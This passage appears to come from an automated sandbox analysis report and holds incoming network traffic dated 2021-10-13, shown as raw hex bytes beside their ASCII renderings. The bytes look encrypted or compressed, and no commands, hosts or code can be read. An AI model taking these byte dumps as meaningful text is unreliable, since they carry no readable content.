ce 86 df 75 55 8b ca 42 a3 5b cd 64 dd c8 ad b7 f2 43 8b 07 c8 19 5e 42 0c 23 a1 aa d1 6a fd 00 cb a1 04 7e 0d cc 06 2c 06 8a 55 d7 fa 35 08 11 7d fb 84 e9 38 Data Ascii: c-9 ]("\|ow)Tqk7T=L]J-o2:qk^CGuqW0`w AAK^~Cj8c8l`q\uc;t;hG&$u^YB4eyuUB[dC^B#j~,U5}8
2021-10-13 07:59:22 UTC	586	IN	Data Raw: 34 a1 d4 9c cd d7 a9 a2 2d 4c b6 7e 80 5b d8 b9 f0 69 a3 57 58 bc 4d 14 47 5c 1a 99 8e c7 4a f4 53 51 38 bb 33 2d a3 f1 10 4c cf 63 f3 8b f4 37 ba 6b b0 3f 68 a4 b9 a8 07 5f 7c b5 32 bf 84 a3 8e fa bc c9 51 67 7c cb fc b8 8a 1a a9 b6 ac b1 3a 45 ea ce 8d 68 22 49 45 f7 ec 71 d0 94 a8 c8 3a 8b f6 26 1c ac be 56 27 6c 85 49 c4 f4 e2 ed b7 a6 77 c9 74 06 17 37 15 c2 2b a0 0a e0 2f 8f 43 02 45 bc 25 86 d6 15 b6 a0 05 18 01 7e d0 ee 2e cc 3b 87 8f a5 a0 6c e7 57 e3 97 81 ac 40 66 b6 7d 51 af 53 b7 af d6 5d b0 38 2f e6 32 63 2d db 9c dc 7c 59 25 9f d6 43 f5 0c 73 ec 60 89 de 88 84 e4 24 ee 83 be cc 78 0e 58 ca 91 eb e4 d6 93 fd 2f 9e c0 d4 84 6c e9 a1 4b fa e5 db 74 e3 0b fa 64 e9 2e 85 4b 57 0f f4 4d 3d 7e 93 8d c9 e2 24 bd af 11 b2 cb 37 6c c3 9c 49 90 6b e7 Data Ascii: 4-L~[iWXMG\JSQ83-Lc7k?h_\|2Qg\|:Eh"IEq:&V'lIwt7+/CE%~.;lW@f}QS]8/2c-\|Y%Cs`$xX/lKtd.KWM=~$7lIk
2021-10-13 07:59:22 UTC	594	IN	Data Raw: b7 99 e5 22 f2 2e 99 26 6c ea 5e f8 83 25 3e 7a 09 ba 08 e4 b4 02 e7 37 81 fd 9a 58 24 75 cd c1 27 e0 14 4b a0 4e af f7 3c 0b 13 fa b2 99 df 11 80 8e 09 f8 d6 37 a2 33 d5 4e da bc f8 54 12 0f 6f 9a 7e ba ca 92 3d 16 3d 7d 2c 57 5c ef 20 f1 8d b6 94 0d eb 76 1e 1d 5f c1 4b 30 9b b8 3d 81 27 91 e8 57 94 e0 aa d8 91 3c 40 ea c4 3b ae 3e 77 31 51 54 3f 1e ed ce 09 b7 1f c7 6f 19 4b 78 fd 77 0d b5 d2 5b 4e 00 82 b5 35 5a 5a 11 76 5b 37 e9 fd 3a 17 1d 63 c4 bb 82 aa 61 a4 d3 4e 38 d0 76 61 8f 9d 5c 91 f7 b4 90 43 28 64 cb fb a7 0f fd 8c 1c d4 d9 87 b1 47 b0 90 60 e9 b8 d2 5b 15 20 b1 fc ff 9b 3a 49 df 3f 04 7a ff d9 4f 56 e8 e3 3d 2e 59 e4 6f ca 62 d2 82 67 48 8a f4 7b 7a 4a f1 5c 59 54 a3 45 1d f1 b1 e9 6f 77 e7 93 e4 b1 1c 59 4e e3 a4 29 d7 1f 98 f1 06 fe b9 Data Ascii: ".&l^%>z7X$u'KN<73NTo~==},W\ v_K0='W<@;>w1QT?oKxw[N5ZZv[7:caN8va\C(dG`[ :I?zOV=.YobgH{zJ\YTEowYN)
2021-10-13 07:59:22 UTC	602	IN	Data Raw: 9c c5 7b da 31 f9 70 8e 93 ed 9f 0e 9f c7 8e 5d 2d f9 b5 b8 c6 f0 ba 79 e6 48 26 cb 00 a2 ad 76 97 4b 4e cb 23 7e 40 c2 9a af 3a 4b 6c 69 09 a0 3d 59 be 17 ec 9e c3 af d3 76 fa 0a 9c ff 95 f3 d4 66 87 d7 ec 1b 3c 73 32 40 34 ae 34 1b 6f dc 78 c5 97 67 72 7b 6d 51 b9 69 1f d3 45 a6 3f 06 f4 17 bf 8f ac a2 e5 99 44 4d b4 5e 5b 39 52 86 e0 32 79 a9 2d 3b e4 30 5d 2f b8 65 fb 7c e3 b6 8a 19 24 2d 7c aa 3e cf ba 1b d6 7d b8 12 9e 81 bf 42 71 58 92 2a ab 6f cc 60 e1 ba 71 c1 42 a5 c3 0b 6f cb 92 e4 13 cc 12 78 6f 95 db 2c b0 dd 40 6e 8f 90 d0 8a ff 2f 36 a2 b4 36 30 29 d5 88 31 0a 5c 66 a9 ab f9 c4 d6 b0 46 79 dc b1 31 d3 62 f1 30 25 3a 4d 04 c6 d3 1f 16 34 15 86 7a 25 63 df 93 cc f5 4a b6 36 fb 62 62 45 fe 93 f4 e5 86 c9 c5 74 63 9a e9 4a 27 07 4f 7f e5 0b 81 Data Ascii: {1p]-yH&vKN#~@:Kli=Yvf<s2@44oxgr{mQiE?DM^[9R2y-;0]/e\|$-\|>}BqX*o`qBoxo,@n/660)1\fFy1b0%:M4z%cJ6bbEtcJ'O
2021-10-13 07:59:22 UTC	609	IN	Data Raw: 4e 1b c4 51 3d 3e 5b 9f 54 5d ea e4 46 c7 d5 92 8e 50 77 60 87 4e bf 61 54 6f ec 4b 29 27 6d 4e 3e 54 c6 e8 49 5b b3 d8 90 c3 bd 90 5a 2c fc 0f 5a 15 78 f3 90 2c aa a7 2c 2d 15 b4 ff cc b4 04 41 a3 83 37 50 8e 36 14 04 9b 9d 0d 50 37 60 ff a1 f5 10 28 26 af 7d 59 a7 3e f5 2c 9c 1a 37 03 41 92 60 94 ef 40 fb 1c 90 18 65 55 41 28 0c df dc fc 18 51 26 80 dc f6 05 fb bb 01 05 c9 60 bf e0 2b bb c1 0d f4 ea 03 6e 75 02 53 c1 0b ea 59 13 65 5a 0c 33 08 40 7b 83 5e 7d 00 04 8b 1d ff c7 99 a2 66 d1 5d d6 c5 54 8a f4 9a ae 7d 99 3e f8 96 6e bd 34 32 f1 63 12 cd 23 7c d6 32 48 39 c6 4c dc 3c 3c 4f f2 5e b3 81 bf 8f cd e6 12 f5 58 67 19 5d d2 e7 69 b3 f6 3e 20 e4 d3 6f f7 c0 4c 97 fb 0b d1 fb 6e 75 f9 43 1c ef 9c d3 fd a8 9d df 09 de dc b7 7a 2f 62 a2 76 b9 85 4e 6f Data Ascii: NQ=>[T]FPw`NaToK)'mN>TI[Z,Zx,,-A7P6P7`(&}Y>,7A`@eUA(Q&`+nuSYeZ3@{^}f]T}>n42c#\|2H9L<<O^Xg]i> oLnuCz/bvNo
2021-10-13 07:59:22 UTC	617	IN	Data Raw: e0 f0 69 b8 35 a5 61 3e 6d 1f 85 84 80 64 3c 13 c1 87 4f d0 4e 8a 8e a0 42 0c 26 a7 8a e0 c8 8f fe 83 37 73 a6 d0 43 cd 15 b3 e3 3d 84 95 c9 9a fd 9d 8e 41 ba 98 8f f9 64 cf 0b 0c 24 de 24 8b d8 bc 9f 2c 98 1f 61 ee f2 cc 3f 39 f1 13 f6 3d f4 c4 bf b7 e4 c3 e3 d0 19 1d 28 fd 53 35 48 fb 3c 86 5d 5c bd 68 f3 a1 88 13 ef 5e e6 42 a6 7b 6e 7c 34 b9 8e 77 06 13 9f ba 88 ac 60 93 ee fa b8 f1 93 a3 6e cc e8 f1 52 c8 2a f6 a6 fc aa 45 55 b0 77 a9 cf 1f 69 77 88 c5 d8 4a 84 9e fd 34 da 6f b1 73 a6 18 70 1c 60 c7 2e 47 8d 4b 50 c4 35 3a ce f7 b7 fd 5f 88 c1 69 5b 24 97 9f e6 71 f5 b6 a0 d1 52 ca 83 2d d9 53 28 ac 0a 54 aa 37 ec 8d af c3 15 28 35 fe 63 73 4e fb 49 ac 89 6d cf 10 b1 bb 1d 84 f2 13 e4 44 59 68 ab f5 54 e5 61 b4 54 0f e5 1a 46 66 8d 1e f3 88 a1 ad 4d Data Ascii: i5a>md<ONB&7sC=Ad$$,a?9=(S5H<]\h^B{n\|4w`nR*EUwiwJ4osp`.GKP5:_i[$qR-S(T7(5csNImDYhTaTFfM
2021-10-13 07:59:22 UTC	625	IN	Data Raw: 8d db a5 a8 5f 93 9b 33 0a 89 94 5a 50 64 0d 63 ff ed 0e c1 46 f5 35 09 48 90 9f 89 70 29 83 cb 20 a3 2b 41 45 77 35 7f bc 05 bd a5 42 d0 5e 6d b7 2d 75 56 ea d5 cc 72 98 e6 ef 22 21 0c c3 2d bf 1e a2 d7 dd 5f 25 6e fb bc cd bb a0 80 d1 ab ea 39 44 e6 af f1 47 fc b5 64 3c 25 1f ac bc 8c bf 25 94 dd fa 66 63 30 5c 7d e2 50 a0 6e cc 8f bc 72 97 aa 78 68 47 eb d2 7b 64 1e 6d f0 8a eb 77 17 e7 92 cb 65 6d 1a 59 92 87 c8 e4 39 87 9c 5e 61 1f ec c8 0e 12 ad c9 be 7e bd e3 6d 72 65 54 c7 8a 9f c2 c2 d9 17 b6 54 6e 22 8a 04 b0 77 ad af f6 9f f0 24 c7 f7 b7 bc d3 1b be e2 cf f7 38 4d 79 db 6e 59 25 ab 4f e1 95 bd f7 71 98 96 73 46 f4 e5 2d a7 3d b9 1f d6 17 62 29 ca 46 9c d7 b8 63 10 a0 ed 9c 6a 3e 42 7d dc dc 4e ea a9 0f 18 ce d2 11 7d ed 31 3c 9e 27 f8 8e b7 a3 Data Ascii: _3ZPdcF5Hp) +AEw5B^m-uVr"!-_%n9DGd<%%fc0\}PnrxhG{dmwemY9^a~mreTTn"w$8MynY%OqsF-=b)Fcj>B}N}1<'
2021-10-13 07:59:22 UTC	633	IN	Data Raw: fe 93 6c 46 23 e6 32 b5 94 58 98 45 58 f4 d3 6c 2e 4c 3a b3 8a b7 0c df 9e d2 c9 da ac a3 c3 b0 b5 e3 2c 35 99 71 2e 26 a2 02 d0 e6 a2 86 7f 7f e1 19 63 e5 43 f5 13 de aa eb 7d 19 d3 2c 06 fc 98 0d 83 79 ee 91 ba 92 68 66 24 13 f7 54 bd 97 0f 5c 48 ff 9c dc 8f 07 b2 94 45 50 e8 35 d8 6e 89 28 b8 c2 3f cc 16 20 55 fb fa c7 d1 ba 5d ae 0f c3 1d 22 b0 04 6d c7 42 55 6f 2f 22 49 fc d7 03 10 16 b4 1a e5 77 4a 90 d2 d7 59 d4 4d bf 3b 10 b1 57 1d 0a 59 a4 ae 26 0b 50 dd c1 af 5e 22 b5 23 89 bd a1 02 4d c9 19 f7 28 52 47 49 1d 41 36 cc be a3 a9 59 e8 b6 69 2e fd 7a 06 ed 7a a7 aa 92 a6 43 b5 b9 83 79 3e 97 2c af 46 62 5f 6e 6b e2 e8 4e a6 b8 fb 7c 33 e8 53 96 14 2b e7 3e 91 a5 26 05 b4 88 5b 41 45 ce 1f 8f 77 26 85 12 83 5e e1 f9 35 77 6c 8a 6a 19 aa e9 03 ac ec Data Ascii: lF#2XEXl.L:,5q.&cC},yhf$T\HEP5n(? U]"mBUo/"IwJYM;WY&P^"#M(RGIA6Yi.zzCy>,Fb_nkN\|3S+>&[AEw&^5wlj
2021-10-13 07:59:22 UTC	641	IN	Data Raw: 4f 3c 92 1e 3e 4b 07 4f 1f 80 4f b0 31 09 34 ff 9f ed 58 32 3e f4 46 f5 7c 6f 97 bd b9 c2 85 1c 51 f4 e0 fc 2a 15 18 44 76 56 53 eb b5 1e 3b 30 9a 37 0a 1d fe d9 11 9f 71 6f 9a b1 d9 9b e3 4b 72 69 56 7b 8a 86 89 f0 ad b6 86 21 7a c3 86 a1 8f 9c 89 92 b0 c4 65 62 b9 a8 b1 6e e5 f3 40 a5 bf f8 d6 f0 be c7 5d b3 88 d2 97 7d fe bd a9 f3 f2 dd 55 4f 67 25 82 b1 26 1b 41 8a 17 b4 7a 9a 4d 24 2e 52 61 ed 49 42 1c 52 13 a7 e3 a9 b6 9d 7f 11 eb 56 3b 33 bd d8 be a9 1e 31 aa 44 d5 92 07 71 51 54 e4 9e 8d 9e 30 7f 73 bb da 57 b1 b3 ca 8a 56 f6 f6 6e 0c 9d 8c ae b9 ae 81 6b 98 bf 03 2a 81 15 31 e8 28 a2 e0 23 7f 82 1c de 92 c0 93 2a c0 55 14 79 a8 08 7d a6 84 d4 ba 17 3d 88 6a fc 03 9c 0b ff 3d 74 45 4b fa 1e 6c ba bd 4b a9 fb 92 26 0f 66 51 3b 81 91 07 3b a2 4e 92 Data Ascii: O<>KOO14X2>F\|oQDvVS;07qoKriV{!zebn@]}UOg%&AzM$.RaIBRV;31DqQT0sWVnk1(#*Uy}=j=tEKlK&fQ;;N
2021-10-13 07:59:22 UTC	648	IN	Data Raw: 32 bf fa e1 df 30 86 2c 63 b8 63 04 84 81 e0 86 dc 61 0e 79 4e 1f df 04 03 97 92 c3 6b 7c 4f 0e ca 04 f0 74 a4 bd fe e0 b5 10 6e 10 42 80 f5 a6 b8 6d 6f 84 26 dd 56 48 29 b4 8b 22 9f 2d 6e 82 66 a9 3b ef 04 7f ef 58 64 9c d3 07 1c 4b ad 95 f3 14 ae 65 6c bc eb dd f9 77 9f 72 3a fd f3 3b 37 03 fd b9 59 36 2b b8 28 de c6 e1 c4 22 26 be bf 93 18 f8 8d 26 13 b6 5d d1 c1 4d 2d 92 8d 09 da 5a 9d ba 1a 33 d0 d0 93 98 e4 ee cc 5f 25 74 bc 3b 9b 82 83 72 83 09 10 21 b8 47 ff 68 06 f1 4b 7d 29 55 ba 80 c9 10 92 ea 49 e9 d3 b0 5b bb 95 c0 69 ca d7 49 a9 60 f4 73 63 b7 96 f2 9c 2c 19 24 d5 72 72 cc e9 13 97 09 9f 15 84 84 4d 5a 8e 56 b3 61 b8 e6 ad 08 b4 ec ec 15 09 ab e1 ee 24 87 95 3f 6f 29 95 44 8f 63 6c cd 31 79 73 2d 4b 45 96 44 c8 8e b9 62 f9 49 c8 f9 e1 f2 3d Data Ascii: 20,ccayNk\|OtnBmo&VH)"-nf;XdKelwr:;7Y6+("&&]M-Z3_%t;r!GhK})UI[iI`sc,$rrMZVa$?o)Dcl1ys-KEDbI=
2021-10-13 07:59:22 UTC	656	IN	Data Raw: 7f 53 e2 78 fd 1f 15 9f 34 9d e6 fc 3b e9 f9 7b e6 a3 ae 13 43 5f df 4f e8 80 5c e5 7b 41 4f 29 35 e9 dd a3 15 de 59 16 eb f5 ae 10 30 3c 87 70 52 52 0d 03 fb d4 44 ea 66 34 8d ae 19 77 99 3c c9 3e bd f9 6a 75 cd d6 06 86 b8 f9 0c 73 da a4 06 62 cc 1d ad 07 8e 8a b1 57 92 94 7b 39 99 44 11 cf 06 7c 11 b4 f1 6b 53 0d 1b cc f6 e5 89 3e bb 87 8b 00 92 11 73 35 9a ae 3f 2f 24 66 0e 85 eb 60 a2 b2 60 af d8 48 8a ff 9b 12 88 38 14 fe 0e 84 d5 6a 19 fe e5 76 7e 67 4f 01 02 ff 68 be 46 1c c2 9d a6 f8 9b 68 26 48 ca 01 33 5b 06 13 ee 6c 0f 07 44 06 02 44 af ff 41 70 60 8b 82 d1 f4 06 1a 03 16 06 d0 2d 46 84 02 c9 7f d9 50 1a fe 09 04 73 f0 0b 9c 7c 0e 17 2c 89 21 e7 9b ee b6 32 66 7f 41 83 fc e4 d3 7a 53 d1 0f 57 0c 9a 1f 79 27 a6 3b ee 52 63 9f 79 e5 61 4a 71 c4 Data Ascii: Sx4;{C_O\{AO)5Y0<pRRDf4w<>jusbW{9D\|kS>s5?/$f``H8jv~gOhFh&H3[lDDAp`-FPs\|,!2fAzSWy';RcyaJq
2021-10-13 07:59:22 UTC	664	IN	Data Raw: ad fb c6 19 64 75 e8 92 92 46 b5 11 a3 e6 65 47 72 aa 73 19 af 8f f4 7b ee 5e f8 a3 0e 48 ed fd 91 ee 6e a4 7b 24 72 6b 87 a5 3b 13 06 a4 5a fd 9a 6c 6b 59 d2 9f 82 f4 90 de 96 76 b4 f6 0e 96 b4 4d ad a4 63 b9 ee 26 b1 a4 ec 6c 85 8a 65 d7 b5 b5 8e 52 dd bf de e0 3e 95 0d e8 e7 2a 64 6c ec 76 cf 78 56 bf 08 61 36 96 2d 59 68 3b fe fa 3d f8 3d 67 d6 13 1f d2 47 9f 59 b4 c4 88 bd b9 c1 df 2b 10 65 a3 b3 45 bb 07 cd 71 b9 c6 85 a0 9b 90 33 40 4f fa b5 58 af 30 6e b4 ef 53 61 a9 f7 87 ee bb 4b 35 c2 dd b5 b8 56 d5 46 98 3f 62 66 fe 0d 2f df 06 77 ef 1f 98 73 ba b8 95 a2 9c b9 3c b4 97 0f 10 b4 75 f1 8a 65 c0 cf 7d 45 a8 a5 ca e8 2b b6 14 e7 29 9a 37 e2 f0 63 7b 32 e4 1a d4 2a d4 9e bc 48 f0 2c c4 a9 ab fe 9a dd 5d 97 7a 43 a9 88 65 2f ea 8e f8 b9 73 0a 61 5d Data Ascii: duFeGrs{^Hn{$rk;ZlkYvMc&leR>dlvxVa6-Yh;==gGY+eEq3@OX0nSaK5VF?bf/ws<ue}E+)7c{2H,]zCe/sa]
2021-10-13 07:59:22 UTC	672	IN	Data Raw: eb 55 7e 6a bf fe aa f8 ef 9e 05 83 92 1b 60 7f bb 9e 42 88 50 5c 49 76 6d 95 57 90 dd 9e b5 a8 b0 e2 59 49 72 2d 97 b0 51 10 b6 eb 26 88 8c d2 94 ba e2 a8 31 67 b2 85 f8 a5 c3 43 db f3 e3 e1 5b b7 28 f2 cf 77 b9 a2 a7 fe bf 98 57 6d 88 c7 17 77 d7 44 6f 2c 35 9b 65 ac df 52 19 44 f1 ca e1 0d 42 8b d0 f1 7e 15 4f 6c d4 4a 7d cd 25 11 42 bc cf 6b 55 9a 85 d8 d5 da 5c 7a d8 87 b0 3d 5f 51 fc f5 fc b2 dd 2a 45 91 73 8f da a9 ba 8d 12 2b f6 2e 1e 75 2f 0f 7b eb 56 36 9e b7 23 f9 24 67 3c 1b eb 78 07 3d 76 63 e4 fd fb 3f bd c1 43 bd eb 64 2f 83 c9 44 ea 92 66 47 65 17 17 cb ac ed c0 e4 1f 58 02 ee 12 e0 54 c2 11 d8 72 ae b1 2c e7 92 87 05 d5 70 6b 15 4c 53 78 48 06 79 e6 ea a1 74 91 2f e5 ac ab 98 c8 1a 22 3f a5 2f 8f 35 bf 99 38 de 5b 28 b5 f1 8d d3 46 a8 77 Data Ascii: U~j`BP\IvmWYIr-Q&1gC[(wWmwDo,5eRDB~OlJ}%BkU\z=_Q*Es+.u/{V6#$g<x=vc?Cd/DfGeXTr,pkLSxHyt/"?/58[(Fw
2021-10-13 07:59:22 UTC	680	IN	Data Raw: 58 ad 53 09 bf 1d 4c ed 66 4a 25 91 bc e6 04 9b 53 6b 72 64 cd 45 db ad c7 43 e5 c7 70 7d 4f 54 9d ed ab 42 ce b6 99 1b b5 f8 bd 89 88 55 c8 b7 48 c8 a5 db f6 57 46 5a 06 40 47 cf f5 fe 4f 40 3e 59 73 f7 84 a4 96 83 9c b3 09 71 4f 21 04 d0 90 18 52 3c e2 12 c7 36 00 70 d6 be 15 46 7a 09 8f b8 44 68 1c d7 ff e8 86 4c 67 88 33 58 bb b3 5b fd 32 a2 e1 9e 37 92 0c f7 79 fb ac 58 05 49 22 34 6d a8 5f 7a e5 27 a6 53 b9 bf f8 29 fa d1 41 c4 4e 27 e4 18 ab a7 8a cb 6f c0 c6 65 e8 d5 52 2e 95 31 15 40 5c ab a1 c0 b4 b9 e8 a7 0a e7 a7 24 b6 14 bd f8 33 af 7f 88 ff 03 61 65 46 55 1d d6 5f 91 74 d6 8b ed a4 a0 de f1 76 c0 8e 47 3c 29 b6 ac 9d 0e fa 60 5b 58 4e 37 09 d4 4e 93 ee 38 e0 3e 37 a1 5b 43 bd a6 f3 9c db 7c 71 72 fb 59 af 91 d5 44 11 f5 70 f6 45 b1 c3 5b 72 Data Ascii: XSLfJ%SkrdECp}OTBUHWFZ@GO@>YsqO!R<6pFzDhLg3X[27yXI"4m_z'S)AN'oeR.1@\$3aeFU_tvG<)`[XN7N8>7[C\|qrYDpE[r
2021-10-13 07:59:22 UTC	688	IN	Data Raw: 08 4d cb 06 16 ca 44 4a 48 c4 c4 cf 01 56 21 82 db aa 04 11 19 54 06 a0 7f ed d9 e6 db a5 6a 4d 9a 7c 53 b1 8a 85 f0 39 25 36 44 91 31 dd ce 11 d1 2b 72 29 47 e9 66 d7 28 4a 29 a2 f8 bc fb d8 e7 27 c8 3e 3c 0c e7 8e df 75 b1 2e 70 90 d5 5e bc bd 32 77 6a c8 84 7e e8 d1 20 ce 39 a1 00 55 bb fa 2e ef 37 61 7c 05 6a 36 df 9c fb 4a 67 76 be c7 de e9 05 ee be 7b 37 e1 01 1a d2 df c3 c0 5b 86 51 0c 75 7b 52 f9 d1 d9 36 ec 1c d2 f3 19 dc 13 79 74 e6 fd e5 57 5d 0a 3e 3f 33 51 94 3f 33 c4 97 a4 be 07 9b 7c 52 e6 1e e4 5f 82 ea 19 29 e6 9f 0d 94 3e 79 04 b7 30 81 09 c2 2d 74 06 e7 02 f4 c1 43 0e 1d 8d 00 0e 15 83 4f 09 30 1c f7 3e 87 34 b6 0f 47 a1 9b 52 21 b9 4b 60 4c ad 0e c3 a3 36 90 40 9b d3 d0 08 6a 99 fe 84 01 77 2a 04 31 25 fc 25 54 42 19 48 3e 04 3f 41 60 Data Ascii: MDJHV!TjM\|S9%6D1+r)Gf(J)'><u.p^2wj~ 9U.7a\|j6Jgv{7[Qu{R6ytW]>?3Q?3\|R_)>y0-tCO0>4GR!K`L6@jw*1%%TBH>?A`
2021-10-13 07:59:22 UTC	695	IN	Data Raw: 98 c2 b3 1a a0 31 41 6b 0b 15 53 63 b6 47 84 86 ed 25 20 67 84 8e 5f dc 92 a1 a6 28 10 c5 1d b2 39 81 35 a2 46 cd 35 76 4c 6d 8f e1 6e 8a 25 de b9 2f d3 a9 d2 3d 14 16 38 a6 3b 3f b2 d1 96 0d 66 32 6e 39 b8 a9 22 88 da cf 97 c9 2b 9a d7 37 21 45 0b f0 b4 51 da ee 72 02 a5 26 21 86 92 ff cf 47 21 38 7a 6e a2 ee db 24 4f 3b 1a cf 4c c5 27 8b dc 78 4e a3 ad 61 d1 fd 1f 7b 8e 9d d1 bb 8e 22 87 51 d4 7a 1f 6f 81 c2 f2 95 1d 36 5b 57 b5 cd f9 35 8f 53 bc fb aa de 6f 5f aa d0 7b 3a fd 65 4b 6b 41 f3 bd fe 07 51 c6 f2 5a 9d 4e 5f 9b e0 6e 58 bf 1a 6b 05 a6 f7 be 3d af 6b 74 da d3 a9 17 0b 9f 63 b4 b7 6f fd 2e c6 99 f7 f7 35 cb 1d b7 af f8 f8 7d 97 33 74 9c e9 fa 4e 57 77 b3 c5 74 5e fe 93 49 56 ae d4 67 5a 1f bb 93 f5 b7 9c 47 b1 3e b2 d0 f8 8c ff 8f e0 d1 73 3a Data Ascii: 1AkScG% g_(95F5vLmn%/=8;?f2n9"+7!EQr&!G!8zn$O;L'xNa{"Qzo6[W5So_{:eKkAQZN_nXk=ktco.5}3tNWwt^IVgZG>s:
2021-10-13 07:59:22 UTC	703	IN	Data Raw: 91 b0 00 00 00 3f f3 de 5c 90 34 58 be af 31 2f f4 e4 61 0d 76 a5 fe 9c 8c 00 00 80 00 02 13 bd 2f f4 e4 60 00 3f e5 97 52 b6 4d f8 e8 82 2a cb fd 39 16 00 00 10 c5 a6 5f e9 c8 b0 00 08 00 07 f8 63 6a 56 ca bf 8f a7 d1 f3 2f f4 e4 78 10 b7 dc bf d3 91 e0 10 00 00 00 42 77 a5 fe 9c 8f 08 04 04 b4 1d 4a d9 74 bf cd a2 0a 80 00 00 08 7b 5e 5f e9 c8 c0 00 00 08 78 23 fc 7e d3 bc 66 b9 1d ce 62 84 25 72 0f c3 da 6a 14 ad c8 c1 58 ae 7e 48 ee 54 6d 53 16 f5 d2 6b c9 24 65 fe 77 2a 36 40 10 cd 72 5f e9 ca 74 00 00 00 08 4e fc bf d3 94 e8 7f 77 36 d1 05 ee fe b0 e5 41 57 82 b3 21 c9 22 5f e6 d1 05 40 00 00 00 85 ec a5 fe 9c 93 00 00 08 6a e3 3c 82 e3 13 58 8a f1 12 35 ec 2c bf cb 15 c6 80 04 2b 76 5f e9 c8 b4 00 00 80 00 21 3b d2 ff 4e 45 a9 7f 9d 90 47 00 40 80 Data Ascii: ?\4X1/av/`?RM9_cjV/xBwJt{^_x#~fb%rjX~HTmSk$ew6@r_tNw6AW!"_@j<X5,+v_!;NEG@
2021-10-13 07:59:22 UTC	711	IN	Data Raw: d3 d9 fe bd 58 b2 67 f4 e5 1c 55 f0 02 7f 4e 51 c0 05 00 02 94 05 bb 93 fa 72 8e 00 3f 81 4b 10 72 ee 29 5d 6f b6 ff 80 00 0b 21 a7 f4 e4 6c 01 40 00 1f 4c ba c4 1c bd ec 3a c4 df e9 86 36 2f f6 9f c8 4e ef e0 bc 8d 67 f4 e4 62 00 00 50 0a 05 bb b3 fa 72 31 03 9c 3c b1 06 0e 42 fb 18 be 03 c1 a7 6f cc c9 e6 c4 76 8e 22 af c3 9c 2f cf 03 fe 00 00 02 eb e9 3f a7 29 a0 00 28 0b 52 ba 97 4f b9 a8 fb f3 2e a8 5f 99 87 29 cf 77 0d 26 c9 fd 39 4e 80 5b 93 3f a7 29 d0 00 00 0a 02 dd e9 fd 39 4e 8b ac a6 bf e8 4e ce de bd 5c de 99 b3 57 60 33 88 3d ed 79 9a 72 a1 c6 ed f3 59 3f a7 2a 00 00 00 02 f2 73 9f d3 95 00 50 00 27 f3 90 1a 69 94 00 2d dd 9f d3 92 58 00 00 00 16 ef cf e5 45 1b 56 28 00 00 00 2d de 9f d3 91 40 00 17 b9 ff ad be 52 b9 f3 92 ed 3c 56 e2 50 ad Data Ascii: XgUNQr?Kr)]o!l@L:6/NgbPr1<Bov"/?)(RO._)w&9N[?)9NN\W`3=yrY?*sP'i-XEV(-@R<VP
2021-10-13 07:59:22 UTC	719	IN	Data Raw: 28 00 40 00 00 4b bd 5f d3 98 a0 00 7a 10 8c e5 69 eb 4b fe 00 00 9d 6a d7 f4 e4 a8 00 00 00 27 fa 4e 2b 39 53 70 d0 70 5e 1b 68 73 0f 04 6e e9 7e 3e 23 39 4c 7e f6 f4 ca 8d 1f 86 20 63 df e0 f3 39 c5 6a fe 37 94 6c 49 0f 5f d3 93 b8 00 00 00 12 ef d7 f4 e4 ee 04 08 fb 47 d9 c9 99 d7 af e4 f3 0d 00 08 d6 00 01 37 db 57 f4 e4 9e 00 40 00 26 0f b8 c9 95 af 7f 9e d8 36 2f df 6d 0b 89 e9 f2 e4 2b d9 fd 4e 52 72 6e d7 97 fc 11 ac 9a 73 57 f4 e4 dc 00 10 00 00 4b bd 5f d3 93 70 25 b0 da 9f 63 d8 97 fc 11 ac 00 00 4b ef 5f d3 93 70 00 00 4d 0f 79 6b 39 34 ad 04 2c 55 ce c8 80 0b 1c 81 c9 ab b3 1f 7f 9c d7 35 fd 39 42 80 26 1e 95 fd 39 42 80 00 00 01 2e fd 7f 4e 50 a4 df 0f b5 3f 8f b1 3d 7f 0a b9 c8 ff 80 00 00 09 ae b5 7f 4e 50 a0 00 15 fc 9e 05 57 80 01 2e fd Data Ascii: (@K_ziKj'N+9Spp^hsn~>#9L~ c9j7lI_G7W@&6/m+NRrnsWK_p%cK_pMyk94,U59B&9B.NP?=NPW.
2021-10-13 07:59:22 UTC	727	IN	Data Raw: ca 62 ff 97 76 78 c9 68 a1 fd 2b 0e 53 1d df a6 13 16 5d 04 73 2c d5 aa 9e 40 e7 29 bf b8 9d d6 fd 5b bd 0f d6 70 5a 5a 7d 15 95 ff 3a fe 43 94 f1 80 00 09 f3 6a bf a7 35 10 00 00 02 bf 94 c2 64 c0 4b bf 5f d3 92 a0 00 00 00 12 ef d7 f4 e4 a8 01 36 05 af e4 44 e2 a4 00 00 13 7e c5 7f 4e 51 a0 00 00 79 e6 53 70 13 36 c4 bf e0 82 69 4d 5f d3 91 e8 00 00 00 12 ef d7 f4 e4 7a 15 fc 87 2a 27 00 00 00 25 df af e9 c8 a4 08 00 07 94 2a 05 7f 7b a8 d2 95 dd ec fb be bf ee a5 b5 75 53 0d 1b e7 8e d3 c9 8e f7 0b 74 1d 89 9a 30 e9 f5 9d 9d ac e7 7d cc 6a be f4 66 87 2a 2c e3 3b 59 63 da 30 ea 35 f0 df cd e9 9d df ed 1d f0 2a 2d a9 9d a6 55 2c 3c dc 29 8b 23 7a 97 bd a1 57 cb 62 bc 39 ee 2a 7f b0 fc b6 cc b6 3f 05 fc bc 19 ee 7f 8b 0e 54 af e2 74 ce 79 67 7e 76 b1 4b Data Ascii: bvxh+S]s,@)[pZZ}:Cj5dK_6D~NQySp6iM_z'%{uSt0}jf,;Yc05-U,<)#zWb9*?Ttyg~vK
2021-10-13 07:59:22 UTC	734	IN	Data Raw: 7a 33 34 e4 f8 26 53 1d 7c f2 90 9b 22 52 6f 9d 74 e4 5d 8c c3 af 05 ab 87 65 e5 f6 9d c4 b5 fe ec 9c 03 24 ac ec f5 75 1e bb 0d fc 32 05 df b6 69 51 13 59 b2 2a 5d 41 9f 33 ce c0 f1 1c 3c e1 62 3c a8 27 dd 9c f7 18 b0 44 6c e2 1a 37 4b 33 b0 d7 c1 45 78 f2 0a 2c a8 18 36 47 e0 0e f2 4e 76 4f cf de c0 ea 57 ce bc 59 45 fb 9d 59 c2 c1 2c 88 bb 93 1b 57 c2 fc a7 57 a3 42 79 7c 26 21 c9 05 82 f6 f6 ec 9c 5f 0b 28 83 58 45 9d 43 65 bc 28 18 77 28 6c e9 d1 b2 45 3c ae 0f 8c c9 8c 65 8c fc c9 f8 46 43 1d ea e4 cd 22 81 da 9a 43 bf 0f 03 7a ac c1 5d 03 1b 78 1e 38 3d 5d e0 6e d5 74 36 60 3c cd e8 de bf f8 05 